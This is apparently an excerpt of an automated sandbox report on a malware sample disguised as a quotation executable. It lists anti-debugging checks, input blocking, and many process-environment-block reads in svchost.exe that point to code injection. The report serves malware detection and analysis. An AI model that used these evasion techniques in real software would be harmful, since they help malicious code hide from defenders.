                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_000C42DE
                Source: cmdkey.exe, 00000006.00000002.292815481224.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, SwDwSdNMaTt.exe, 00000007.00000002.293706324420.0000000000DAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.289571854198.0000026A51EDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllii
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387088E rdtsc 3_2_0387088E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417AD3 LdrLoadDll,3_2_00417AD3
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0013EAA2 BlockInput,2_2_0013EAA2
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000F2622
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_000C42DE
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E4CE8 mov eax, dword ptr fs:[00000030h]2_2_000E4CE8
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00E1B5E0 mov eax, dword ptr fs:[00000030h]2_2_00E1B5E0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00E1B580 mov eax, dword ptr fs:[00000030h]2_2_00E1B580
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00E19F40 mov eax, dword ptr fs:[00000030h]2_2_00E19F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A390 mov eax, dword ptr fs:[00000030h]3_2_0385A390
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A390 mov eax, dword ptr fs:[00000030h]3_2_0385A390
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385A390 mov eax, dword ptr fs:[00000030h]3_2_0385A390
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D43BA mov eax, dword ptr fs:[00000030h]3_2_038D43BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D43BA mov eax, dword ptr fs:[00000030h]3_2_038D43BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC3B0 mov eax, dword ptr fs:[00000030h]3_2_038AC3B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E3C0 mov eax, dword ptr fs:[00000030h]3_2_0382E3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E3C0 mov eax, dword ptr fs:[00000030h]3_2_0382E3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E3C0 mov eax, dword ptr fs:[00000030h]3_2_0382E3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C3C7 mov eax, dword ptr fs:[00000030h]3_2_0382C3C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038363CB mov eax, dword ptr fs:[00000030h]3_2_038363CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038643D0 mov ecx, dword ptr fs:[00000030h]3_2_038643D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE3DD mov eax, dword ptr fs:[00000030h]3_2_038BE3DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B43D5 mov eax, dword ptr fs:[00000030h]3_2_038B43D5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D630E mov eax, dword ptr fs:[00000030h]3_2_038D630E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E310 mov eax, dword ptr fs:[00000030h]3_2_0384E310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E310 mov eax, dword ptr fs:[00000030h]3_2_0384E310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E310 mov eax, dword ptr fs:[00000030h]3_2_0384E310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386631F mov eax, dword ptr fs:[00000030h]3_2_0386631F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868322 mov eax, dword ptr fs:[00000030h]3_2_03868322
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868322 mov eax, dword ptr fs:[00000030h]3_2_03868322
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03868322 mov eax, dword ptr fs:[00000030h]3_2_03868322
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E328 mov eax, dword ptr fs:[00000030h]3_2_0382E328
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E328 mov eax, dword ptr fs:[00000030h]3_2_0382E328
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382E328 mov eax, dword ptr fs:[00000030h]3_2_0382E328
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4320 mov eax, dword ptr fs:[00000030h]3_2_038E4320
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828347 mov eax, dword ptr fs:[00000030h]3_2_03828347
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828347 mov eax, dword ptr fs:[00000030h]3_2_03828347
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03828347 mov eax, dword ptr fs:[00000030h]3_2_03828347
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A350 mov eax, dword ptr fs:[00000030h]3_2_0386A350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h]3_2_0386E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h]3_2_0386E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h]3_2_0386E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h]3_2_0386E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h]3_2_0386E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h]3_2_0386E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h]3_2_0386E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h]3_2_0386E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE372 mov eax, dword ptr fs:[00000030h]3_2_038AE372
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE372 mov eax, dword ptr fs:[00000030h]3_2_038AE372
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE372 mov eax, dword ptr fs:[00000030h]3_2_038AE372
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE372 mov eax, dword ptr fs:[00000030h]3_2_038AE372
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0371 mov eax, dword ptr fs:[00000030h]3_2_038B0371
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0371 mov eax, dword ptr fs:[00000030h]3_2_038B0371
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385237A mov eax, dword ptr fs:[00000030h]3_2_0385237A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE289 mov eax, dword ptr fs:[00000030h]3_2_038AE289
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038542AF mov eax, dword ptr fs:[00000030h]3_2_038542AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038542AF mov eax, dword ptr fs:[00000030h]3_2_038542AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C2B0 mov ecx, dword ptr fs:[00000030h]3_2_0382C2B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h]3_2_0383A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h]3_2_0383A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h]3_2_0383A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h]3_2_0383A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h]3_2_0383A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h]3_2_0383A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038382E0 mov eax, dword ptr fs:[00000030h]3_2_038382E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038382E0 mov eax, dword ptr fs:[00000030h]3_2_038382E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038382E0 mov eax, dword ptr fs:[00000030h]3_2_038382E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038382E0 mov eax, dword ptr fs:[00000030h]3_2_038382E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h]3_2_038402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h]3_2_038402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h]3_2_038402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h]3_2_038402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h]3_2_038402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h]3_2_038402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h]3_2_038402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h]3_2_038402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A200 mov eax, dword ptr fs:[00000030h]3_2_0382A200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382821B mov eax, dword ptr fs:[00000030h]3_2_0382821B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0227 mov eax, dword ptr fs:[00000030h]3_2_038B0227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0227 mov eax, dword ptr fs:[00000030h]3_2_038B0227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0227 mov eax, dword ptr fs:[00000030h]3_2_038B0227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A22B mov eax, dword ptr fs:[00000030h]3_2_0386A22B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A22B mov eax, dword ptr fs:[00000030h]3_2_0386A22B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A22B mov eax, dword ptr fs:[00000030h]3_2_0386A22B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03850230 mov ecx, dword ptr fs:[00000030h]3_2_03850230
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834180 mov eax, dword ptr fs:[00000030h]3_2_03834180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834180 mov eax, dword ptr fs:[00000030h]3_2_03834180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834180 mov eax, dword ptr fs:[00000030h]3_2_03834180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E1A4 mov eax, dword ptr fs:[00000030h]3_2_0386E1A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E1A4 mov eax, dword ptr fs:[00000030h]3_2_0386E1A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038641BB mov ecx, dword ptr fs:[00000030h]3_2_038641BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038641BB mov eax, dword ptr fs:[00000030h]3_2_038641BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038641BB mov eax, dword ptr fs:[00000030h]3_2_038641BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038401C0 mov eax, dword ptr fs:[00000030h]3_2_038401C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038401C0 mov eax, dword ptr fs:[00000030h]3_2_038401C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h]3_2_0383A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h]3_2_0383A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h]3_2_0383A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h]3_2_0383A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h]3_2_0383A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F81EE mov eax, dword ptr fs:[00000030h]3_2_038F81EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F81EE mov eax, dword ptr fs:[00000030h]3_2_038F81EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038281EB mov eax, dword ptr fs:[00000030h]3_2_038281EB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038401F1 mov eax, dword ptr fs:[00000030h]3_2_038401F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038401F1 mov eax, dword ptr fs:[00000030h]3_2_038401F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038401F1 mov eax, dword ptr fs:[00000030h]3_2_038401F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860118 mov eax, dword ptr fs:[00000030h]3_2_03860118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BA130 mov eax, dword ptr fs:[00000030h]3_2_038BA130
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A147 mov eax, dword ptr fs:[00000030h]3_2_0382A147
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A147 mov eax, dword ptr fs:[00000030h]3_2_0382A147
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A147 mov eax, dword ptr fs:[00000030h]3_2_0382A147
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386415F mov eax, dword ptr fs:[00000030h]3_2_0386415F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836179 mov eax, dword ptr fs:[00000030h]3_2_03836179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904080 mov eax, dword ptr fs:[00000030h]3_2_03904080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904080 mov eax, dword ptr fs:[00000030h]3_2_03904080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904080 mov eax, dword ptr fs:[00000030h]3_2_03904080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904080 mov eax, dword ptr fs:[00000030h]3_2_03904080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904080 mov eax, dword ptr fs:[00000030h]3_2_03904080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904080 mov eax, dword ptr fs:[00000030h]3_2_03904080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904080 mov eax, dword ptr fs:[00000030h]3_2_03904080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A093 mov ecx, dword ptr fs:[00000030h]3_2_0382A093
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C090 mov eax, dword ptr fs:[00000030h]3_2_0382C090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6090 mov eax, dword ptr fs:[00000030h]3_2_038C6090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038700A5 mov eax, dword ptr fs:[00000030h]3_2_038700A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h]3_2_038B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h]3_2_038B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h]3_2_038B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h]3_2_038B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h]3_2_038B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h]3_2_038B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h]3_2_038B60A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC0E0 mov ecx, dword ptr fs:[00000030h]3_2_038BC0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C0F6 mov eax, dword ptr fs:[00000030h]3_2_0382C0F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838009 mov eax, dword ptr fs:[00000030h]3_2_03838009
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872010 mov ecx, dword ptr fs:[00000030h]3_2_03872010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860044 mov eax, dword ptr fs:[00000030h]3_2_03860044
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6040 mov eax, dword ptr fs:[00000030h]3_2_038B6040
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836074 mov eax, dword ptr fs:[00000030h]3_2_03836074
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836074 mov eax, dword ptr fs:[00000030h]3_2_03836074
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038307A7 mov eax, dword ptr fs:[00000030h]3_2_038307A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov ecx, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038CC7B0 mov eax, dword ptr fs:[00000030h]3_2_038CC7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038CC7B0 mov eax, dword ptr fs:[00000030h]3_2_038CC7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E7E0 mov eax, dword ptr fs:[00000030h]3_2_0385E7E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385270D mov eax, dword ptr fs:[00000030h]3_2_0385270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385270D mov eax, dword ptr fs:[00000030h]3_2_0385270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385270D mov eax, dword ptr fs:[00000030h]3_2_0385270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383471B mov eax, dword ptr fs:[00000030h]3_2_0383471B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383471B mov eax, dword ptr fs:[00000030h]3_2_0383471B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4730 mov eax, dword ptr fs:[00000030h]3_2_038E4730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4730 mov eax, dword ptr fs:[00000030h]3_2_038E4730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov ecx, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A750 mov eax, dword ptr fs:[00000030h]3_2_0386A750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE750 mov eax, dword ptr fs:[00000030h]3_2_038DE750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03842760 mov ecx, dword ptr fs:[00000030h]3_2_03842760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860774 mov eax, dword ptr fs:[00000030h]3_2_03860774
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834779 mov eax, dword ptr fs:[00000030h]3_2_03834779
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834779 mov eax, dword ptr fs:[00000030h]3_2_03834779
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838690 mov eax, dword ptr fs:[00000030h]3_2_03838690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC691 mov eax, dword ptr fs:[00000030h]3_2_038BC691
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F86A8 mov eax, dword ptr fs:[00000030h]3_2_038F86A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F86A8 mov eax, dword ptr fs:[00000030h]3_2_038F86A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E46CB mov eax, dword ptr fs:[00000030h]3_2_038E46CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E46CB mov eax, dword ptr fs:[00000030h]3_2_038E46CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038306CF mov eax, dword ptr fs:[00000030h]3_2_038306CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA6C0 mov eax, dword ptr fs:[00000030h]3_2_038FA6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D86C2 mov eax, dword ptr fs:[00000030h]3_2_038D86C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C66D0 mov eax, dword ptr fs:[00000030h]3_2_038C66D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C66D0 mov eax, dword ptr fs:[00000030h]3_2_038C66D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE6D0 mov eax, dword ptr fs:[00000030h]3_2_038DE6D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383C6E0 mov eax, dword ptr fs:[00000030h]3_2_0383C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038566E0 mov eax, dword ptr fs:[00000030h]3_2_038566E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038566E0 mov eax, dword ptr fs:[00000030h]3_2_038566E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC6F2 mov eax, dword ptr fs:[00000030h]3_2_038AC6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC6F2 mov eax, dword ptr fs:[00000030h]3_2_038AC6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03904600 mov eax, dword ptr fs:[00000030h]3_2_03904600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C620 mov eax, dword ptr fs:[00000030h]3_2_0386C620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830630 mov eax, dword ptr fs:[00000030h]3_2_03830630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860630 mov eax, dword ptr fs:[00000030h]3_2_03860630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8633 mov esi, dword ptr fs:[00000030h]3_2_038B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8633 mov eax, dword ptr fs:[00000030h]3_2_038B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8633 mov eax, dword ptr fs:[00000030h]3_2_038B8633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C640 mov eax, dword ptr fs:[00000030h]3_2_0386C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386C640 mov eax, dword ptr fs:[00000030h]3_2_0386C640
